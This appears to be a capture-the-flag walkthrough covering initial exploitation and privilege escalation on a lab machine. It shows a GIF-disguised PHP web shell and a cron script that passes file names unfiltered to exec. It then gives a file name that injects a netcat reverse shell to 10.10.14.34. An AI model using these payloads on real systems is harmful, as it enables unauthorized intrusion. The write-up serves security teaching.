Exploitation
Executing Code
GIF87a
<?php system($_GET['cmd']); ?>
Reverse Shell
Privilege Escalation
Found crontab
Since we cannot write into these files, lets read the check_attack.php
bash-4.2$ cat check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";
$files = array();
$files = preg_grep('/^([^.])/', scandir($path));
foreach ($files as $key => $value) {
$msg='';
if ($value == 'index.html') {
continue;
}
#echo "-------------\n";
#print "check: $value\n";
list ($name,$ext) = getnameCheck($value);
$check = check_ip($name,$value);
if (!($check[0])) {
echo "attack!\n";
# todo: attach file
file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
mail($to, $msg, $msg, $headers, "-F$value");
}
}
?>Analyzing this script it checks for files that aren't suppose to be in the uploads directory and deletes them, but pay attention to how it deletes the files, it appends them to the rm command without any filtering which makes it vulnerable to command injection
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");$path is the value of the upload directory
$path = '/var/www/html/uploads/';$value is the suspicious file's name
by going into /var/www/html/uploads, we can create a file that holds the payload in its name. it we start the file with a ; semi colon it will en the rm command and execute whatever code we put.
touch '; nc 10.10.14.34 4444 -c bash'since the script appends the name of the file, we create the above file with the name beggining with ; nc. the semi colon will end the command and execute all other code after it.
Last updated
Was this helpful?